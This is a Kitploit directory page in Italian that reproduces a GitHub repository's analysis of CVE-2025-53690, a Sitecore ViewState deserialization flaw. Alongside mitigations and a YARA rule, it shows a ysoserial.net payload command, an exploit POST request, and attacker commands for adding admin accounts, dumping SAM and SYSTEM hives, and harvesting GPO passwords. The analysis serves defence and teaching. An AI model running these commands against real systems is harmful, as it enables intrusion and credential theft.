Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-53690-Analysis — Questi sono i documenti di analisi di CVE-2025-53690. | Kitploit
Strumenti/GitHubGitHub/m0d0ri205/cve-2025-53690-analysis
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebInformatica ForenseAnalisi MalwarePenetration TestingApprendimento e FormazioneRed TeamingRisposta agli Incidenti
GitHubm0d0ri205/cve-2025-53690-analysis

CVE-2025-53690-Analysis

Questi sono i documenti di analisi di CVE-2025-53690.

3131 anno faNon ancora revisionato
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-53690: Analisi della vulnerabilità di deserializzazione ViewState di Sitecore

Panoramica

CVE-2025-53690 è una vulnerabilità di deserializzazione ViewState scoperta nella famiglia di prodotti Sitecore, una vulnerabilità di sicurezza critica che consente l'esecuzione remota di codice sfruttando una machine key ASP.NET esposta.

Informazioni di base

  • CVE ID: CVE-2025-53690
  • Punteggio CVSS: 9.0 (Critico)
  • Tipo di vulnerabilità: Deserialization of Untrusted Data (CWE-502)
  • Data di scoperta: Settembre 2025
  • Data di divulgazione: 3 settembre 2025
  • Sfruttamento effettivo: Sfruttato come zero-day da dicembre 2024

Prodotti interessati

  • Sitecore Experience Manager (XM) - tutte le versioni 9.0 e precedenti
  • Sitecore Experience Platform (XP) - tutte le versioni 9.0 e precedenti
  • Sitecore Experience Commerce (XC)
  • Sitecore Managed Cloud
  • Modulo Active Directory 1.4 e precedenti

Analisi dettagliata della vulnerabilità

Causa principale

Il cuore di questa vulnerabilità risiede in una gestione errata della configurazione:

  1. Utilizzo di una Machine Key di esempio: Una machine key ASP.NET di esempio inclusa nella guida alla distribuzione di Sitecore precedente al 2017 è stata utilizzata così com'è in ambienti di produzione.
  2. Riutilizzo di chiave statica: La stessa machine key è stata riutilizzata in più distribuzioni.
  3. Bypass della convalida ViewState: La chiave esposta consente di bypassare la convalida dell'integrità di ViewState.

Meccanismo di ViewState ASP.NET

ViewState è una funzionalità di gestione dello stato di ASP.NET:

  • Memorizza lo stato della pagina web in un campo nascosto __VIEWSTATE
  • Utilizza la machine key per garantire integrità e riservatezza
  • Il server deserializza ViewState per ripristinare lo stato della pagina
<!-- web.config 예시 -->
<system.web>
    <machineKey 
        validationKey="[64바이트 키]"
        decryptionKey="[48바이트 키]"
        validation="HMACSHA256" 
        decryption="AES" />
</system.web>

Vettori di attacco

1. Identificazione degli endpoint vulnerabili

Target: /sitecore/blocked.aspx
Method: POST
특징: 인증 없이 접근 가능, ViewState 사용

2. Generazione del payload ViewState dannoso

L'attaccante genera un payload dannoso utilizzando la machine key nota e ysoserial.net:

# ysoserial.net 사용 예시
ysoserial.exe -f ViewState -g TypeConfuseDelegate -c "calc.exe" --validationkey="[키]" --validationalg="HMACSHA256" --decryptionkey="[키]" --decryptionalg="AES"

3. Invio della richiesta HTTP

POST /sitecore/blocked.aspx HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

__VIEWSTATE=[악성_페이로드]&__VIEWSTATEGENERATOR=[값]

Analisi dei casi di attacco reali (Rapporto Mandiant)

Ciclo di vita dell'attacco

Fase 1: Penetrazione iniziale

  • Endpoint: /sitecore/blocked.aspx
  • Metodo: Attacco di deserializzazione ViewState
  • Privilegi: NETWORK SERVICE (processo worker IIS)
  • Payload: Strumento di ricognizione WEEPSTEEL

Fase 2: Ricognizione e costruzione di una base

# 실행된 명령들
whoami
hostname  
net user
tasklist
ipconfig /all
netstat -ano
net group "domain admins"

Strumenti distribuiti:

  • 7za.exe: Strumento di compressione file
  • lfe.ico: Strumento di tunneling di rete EARTHWORM
  • 1.vbs: Script VBS per esecuzione comandi

Fase 3: Escalation dei privilegi

# 로컬 관리자 계정 생성
net user asp$ [패스워드] /add
net localgroup administrators asp$ /add

net user sawadmin [패스워드] /add  
net localgroup administrators sawadmin /add

Raccolta credenziali:

reg save HKLM\SYSTEM c:\users\public\system.hive
reg save HKLM\SAM c:\users\public\sam.hive

Fase 4: Persistenza

  • Accesso RDP: Utilizzo dell'account amministratore creato
  • DWAGENT: Installazione dello strumento di accesso remoto (registrato come servizio con privilegi SYSTEM)
  • Modifica delle impostazioni dell'account:
net user [AdminUser] /passwordchg:no /expires:never
wmic useraccount where name='[AdminUser]' set PasswordExpires=False

Fase 5: Ricognizione interna

# Domain Controller 식별
nltest /DCLIST:[domain]
nslookup [domain-controller]

# GPO에서 cpassword 검색 (Group Policy Preferences 공격)
findstr /S /l cpassword \\[DC]\sysvol\[domain]\policies\*.xml

# BloodHound/SharpHound 실행
sh.exe -c all

Fase 6: Movimento laterale

  • Accesso RDP ad altri sistemi con l'account amministratore di dominio compromesso
  • Bypass della sicurezza tramite tunneling di rete con EARTHWORM

Analisi degli strumenti utilizzati

WEEPSTEEL (strumento di ricognizione)

// 수집하는 정보
Information.BasicsInfo basicsInfo = new Information.BasicsInfo
{
    Directories = new Information.Directories
    {
        CurrentWebDirectory = HostingEnvironment.MapPath("~/")
    },
    OperatingSystemInformation = Information.GetOperatingSystemInformation(),
    DiskInformation = Information.GetDiskInformation(),
    NetworkAdapterInformation = Information.GetNetworkAdapterInformation(),
    Process = Information.GetProcessInformation()
};

Metodo di output: occultamento dei dati mascherandoli come ViewState

<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 
       value="/wEPDwUKLTcyODc4{AES 암호화 + base64 인코딩된 출력}" />

EARTHWORM (tunneling di rete)

  • Funzionalità di server proxy SOCKS v5
  • Bypass firewall e occultamento del traffico
  • Evasione della rilevazione tunnelizzando il traffico RDP

DWAGENT (accesso remoto)

  • Strumento di amministrazione remota legittimo
  • Registrato come servizio con privilegi SYSTEM
  • Persistenza garantita tramite avvio automatico

SHARPHOUND (ricognizione AD)

  • Strumento di raccolta dati per BloodHound
  • Mappatura dell'ambiente Active Directory
  • Identificazione dei percorsi di attacco

Misure di difesa e mitigazione

Azioni immediate

<!-- 고유한 machine key 생성 -->
<machineKey 
    validationKey="[새로운_64바이트_키]"
    decryptionKey="[새로운_48바이트_키]"
    validation="HMACSHA256" 
    decryption="AES" />

Misure di rafforzamento della sicurezza

  1. Rotazione automatica delle chiavi
  2. Abilitazione della convalida MAC ViewState
  3. Criptografia dei file di configurazione
  4. Segmentazione di rete
  5. Monitoraggio potenziato

Regole di rilevamento

# YARA 규칙 예시 (WEEPSTEEL 탐지)
rule WEEPSTEEL_Detection {
    strings:
        $viewstate = "__VIEWSTATE"
        $crypto = "System.Security.Cryptography"
        $serializer = "JavaScriptSerializer"
    condition:
        all of them
}

Conclusione

CVE-2025-53690 è un esempio rappresentativo di come un semplice errore di configurazione possa portare a una minaccia di sicurezza fatale. Attraverso questa vulnerabilità, gli studenti possono sperimentare l'intero ciclo di vita di un attacco APT reale e comprendere le moderne tecniche di attacco e le strategie di difesa.

Riferimenti

  • Google Cloud Blog - ViewState Deserialization Zero-Day
  • Sitecore Advisory SC2025-005
  • CISA KEV Catalog
  • ysoserial.net
  • Microsoft Security Blog - ASP.NET Machine Keys
Scarica lo strumento